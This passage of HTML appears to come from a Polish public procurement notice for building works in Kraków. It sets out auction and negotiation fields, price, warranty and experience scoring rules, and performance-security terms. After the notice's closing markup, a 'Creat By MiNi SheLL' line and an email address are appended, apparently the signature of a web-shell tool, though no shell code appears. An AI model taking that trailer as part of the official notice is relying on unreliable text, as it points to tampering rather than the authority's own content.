złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Dodatkowy okres gwarancji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie kierownika budowy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie głównego projektanta</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">Istotne postanowienia umowy zostały zawarte we wzorze umowy, stanowiącym załącznik nr 1 do siwz. </span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">1. Przed zawarciem umowy wybrany wykonawca zostanie zobowiązany, na podstawie art. 147 ustawy do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie, zgodnie z art. 150 ust. 2 ustawy.2. Zabezpieczenie należytego wykonania umowy należy wnieść w jednej lub w kilku następujących formach:1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;3) gwarancjach bankowych;4) gwarancjach ubezpieczeniowych;5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.Do zabezpieczenia stosuje się przepisy art. 147 – 151 ustawy.3. Dopuszczalne jest złożenie zabezpieczenia w więcej niż jednej formie, a także zmiana formy wniesionego zabezpieczenia (zmiana taka może być dokonywana jedynie z zachowaniem ciągłości zabezpieczenia i nie może powodować zmniejszenia jego wysokości).4. Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek: Narodowy Bank Polski nr 94 1010 1270 0051 2213 9120 0000.5. Zabezpieczenie wnoszone w formach określonych w pkt 23.2.2) – 23.2.5) należy przesłać lub złożyć w siedzibie zamawiającego.6. Zabezpieczenie należytego wykonania umowy składane w formach gwarancji i poręczeń musi spełniać następujące wymogi:- być wystawione na Małopolski Urząd Wojewódzki w Krakowie, ul. Basztowa 22, 31-156 Kraków,- zawierać w treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty zabezpieczenia należytego wykonania umowy na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zabezpieczenie to jest mu należne,- okres ważności zabezpieczenia należytego wykonania umowy nie może być krótszy niż okres realizacji umowy i rękojmi.7. Jeżeli okres na jaki ma zostać wniesione zabezpieczenie przekracza 5 lat, zabezpieczenie w pieniądzu wnosi się na cały ten okres, a zabezpieczenie w innej formie wnosi się na okres nie krótszy niż 5 lat, z jednoczesnym zobowiązaniem się wykonawcy do przedłużenia zabezpieczenia lub wniesienia nowego zabezpieczenia na kolejne okresy.8. Warunki i termin zwrotu zabezpieczenia należytego wykonania umowy zostały określone we wzorze umowy, stanowiącym załącznik nr 1 do siwz.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zasady zmian zawartej umowy w sprawie zamówienia publicznego określone zostały w art. 144 ustawy. 2. Dopuszczalne zmiany treści zawartej umowy na podstawie art. 144 ust. 1 pkt 1 ustawy oraz warunki dokonania takich zmian zostały określone we wzorze umowy, stanowiącym załącznik nr 1 do siwz. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-04-21</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">jęz. polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">I. Zamawiający, działając na podstawie art. 93 ust. 1a ustawy zastrzega, iż może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki, które zamierza przeznaczyć na sfinansowanie zamówienia, nie zostaną mu przyznane. II. Kryteria oceny ofert:1. Liczba punktów jaką uzyska wykonawca w kryterium „cena” zostanie obliczona według wzoru:C = (Cmin / Cob) x 60 gdzie:	C	- ilość punktów oferty badanejCmin	- najniższa cena spośród badanych ofertCob	- cena oferty badanejZ tytułu kryterium „cena” Wykonawca może uzyskać maksymalnie 60 pkt.2. Liczba punktów jaką uzyska wykonawca w kryterium „dodatkowy okres gwarancji” odnosi się do oferowanej przez Wykonawcę gwarancji na wykonane roboty budowlane, zastosowane materiały oraz zamontowane urządzenia i systemy i zostanie przyznana w następujący sposób:1) Minimalny, wymagany okres gwarancji wynosi 36 miesięcy.2) Wykonawca zobowiązany jest podać w formularzu oferty jeden z dwóch niżej wymienionych dodatkowych okresów, o który zostanie wydłużona 36 miesięczna gwarancja na przedmiot zamówienia:a) za zaoferowanie rozszerzenia gwarancji o dodatkowe 12 miesięcy (łącznie gwarancja będzie wynosić 48 miesięcy), Wykonawca otrzyma 10 punktów,b) za zaoferowanie rozszerzenia gwarancji o dodatkowe 24 miesiące (łącznie gwarancja będzie wynosić 60 miesięcy), Wykonawca otrzyma 20 punktów.3) W przypadku, gdy Wykonawca wskaże oferowany dodatkowy okres gwarancji dłuższy niż 24 miesiące, przyjmuje się, że udzieli on gwarancji na maksymalny okres 60 miesięcy i w kryterium gwarancji otrzyma on maksymalną liczbę 20 pkt.4) W przypadku gdy Wykonawca nie poda dodatkowego okresu gwarancji lub wskaże go nieprawidłowo, tzn. nie wskaże jednej z dwóch powyższych możliwości, Zamawiający nie przyzna punktów w kryterium oceny ofert – „dodatkowy okres gwarancji”.5) Z tytułu kryterium „dodatkowy okres gwarancji” Wykonawca może uzyskać maksymalnie 20 pkt. 3. Liczba punktów jaką uzyska wykonawca w kryterium „doświadczenie kierownika budowy” zostanie przyznana w następujący sposób:a) Punkty w kryterium „doświadczenie kierownika budowy” będą przyznawane za doświadczenie zawodowe osoby wskazanej przez Wykonawcę do pełnienia funkcji kierownika budowy w branży konstrukcyjno – budowlanej lub architektonicznej - po 5 punktów za każdą z dwóch wykazanych inwestycji, przy których osoba wskazana przez Wykonawcę pełniła funkcję kierownika budowy, zakończonych w okresie ostatnich 10 lat (licząc od dnia wyznaczonego na składanie ofert), obejmujących budowę, nadbudowę lub rozbudowę budynku użyteczności publicznej, o wartości min. 5 000 000 zł każda, zakończonych uzyskaniem ostatecznego pozwolenia na użytkowanie (lub równorzędne). b) W kryterium „doświadczenie kierownika budowy” oferta Wykonawcy może uzyskać maksymalnie - 10 pkt: - za pełnienie funkcji kierownika budowy przy 1 inwestycji polegającej na budowie, nadbudowie lub rozbudowie budynku użyteczności publicznej, o wartości robót budowlanych wynoszącej min. 5 000 000 zł, zakończonej uzyskaniem ostatecznego pozwolenia na użytkowanie (lub równorzędne) - 5 pkt, - za pełnienie funkcji kierownika budowy przy co najmniej 2 inwestycjach polegających na budowie, nadbudowie lub rozbudowie budynku użyteczności publicznej, o wartości robót budowlanych wynoszącej min. 5 000 000 zł każda, zakończonych uzyskaniem ostatecznego pozwolenia na użytkowanie (lub równorzędne) - 10 pkt,- pod pojęciem „budynku użyteczności publicznej” Zamawiający rozumie budynki użyteczności publicznej zgodnie z definicją zawartą w § 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2019 r., poz. 1065, j.t. z późn. zm.), z wyłączeniem obiektów o konstrukcji stalowej lub z prefabrykatów wielkogabarytowych typu hale stałe, systemowe, magazyny. Zamawiający za „budynek użyteczności publicznej” uznaje również budynek biurowy, natomiast wyłączeniu podlegają garaże, myjnie samochodowe oraz parkingi wielopoziomowe,− pojęcia użyte powyżej, tj. budowa, nadbudowa, rozbudowa należy definiować zgodnie z art. 3 ustawy Prawo budowlane.4. Liczba punktów jaką uzyska wykonawca w kryterium „doświadczenie głównego projektanta” zostanie przyznana w następujący sposób:a) Punkty w kryterium „doświadczenie głównego projektanta” będą przyznawane za doświadczenie zawodowe osoby wskazanej przez Wykonawcę do pełnienie funkcji głównego projektanta, obejmujące zaprojektowanie w specjalności architektonicznej w okresie ostatnich 5 lat (licząc od dnia wyznaczonego na składanie ofert), budowy, nadbudowy lub rozbudowy budynku użyteczności publicznej, o wartości robót budowlanych wynoszącej min. 5 000 000 zł każda z inwestycji, gdzie osoba wskazana przez Wykonawcę pełniła funkcję głównego projektanta, a zaprojektowana inwestycja została ukończona i uzyskała ostateczne pozwolenie na użytkowanie (lub równorzędne). b) W kryterium „doświadczenie głównego projektanta” oferta Wykonawcy może uzyskać maksymalnie - 10 pkt: - za 1 wykazaną inwestycje obejmującą wykonanie w specjalności architektonicznej projektu budowy, nadbudowy lub rozbudowy budynku użyteczności publicznej, na podstawie którego zrealizowano inwestycję budowlaną o wartości robót budowlanych wynoszącej min. 5 000 000 zł i uzyskano dla niej ostateczne pozwolenie na użytkowanie (lub równorzędne) - 5 pkt,- za 2 wykazane inwestycje obejmujące wykonanie w specjalności architektonicznej projektów budowy, nadbudowy lub rozbudowy budynku użyteczności publicznej, na podstawie którego zrealizowano inwestycję budowlaną o wartości robót budowlanych wynoszącej min. 5 000 000 zł i uzyskano dla niej ostateczne pozwolenie na użytkowanie (lub równorzędne) - 10 pkt.- pod pojęciem „budynku użyteczności publicznej” Zamawiający rozumie budynki użyteczności publicznej zgodnie z definicją zawartą w § 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2019 r., poz. 1065, j.t. z późn. zm.), z wyłączeniem obiektów o konstrukcji stalowej lub z prefabrykatów wielkogabarytowych typu hale stałe, systemowe, magazyny. Zamawiający za „budynek użyteczności publicznej” uznaje również budynek biurowy, natomiast wyłączeniu podlegają garaże, myjnie samochodowe oraz parkingi wielopoziomowe,− pojęcia użyte powyżej, tj. budowa, nadbudowa, rozbudowa należy definiować zgodnie z art. 3 ustawy Prawo budowlane.5. Korzystając z powyższych zasad zamawiający obliczy wartość punktową każdej oferty. Zamawiający przyzna punktację na podstawie oświadczeń i informacji złożonych przez Wykonawcę w formularzu oferty.6. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów, otrzymaną w wyniku zsumowania punktów uzyskanych we wszystkich kryteriach: „cena” „dodatkowy okres gwarancji”, „doświadczenie kierownika budowy” i „doświadczenie głównego projektanta”.7. Zamawiający udzieli zamówienia wykonawcy, który złoży ofertę najkorzystniejszą. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com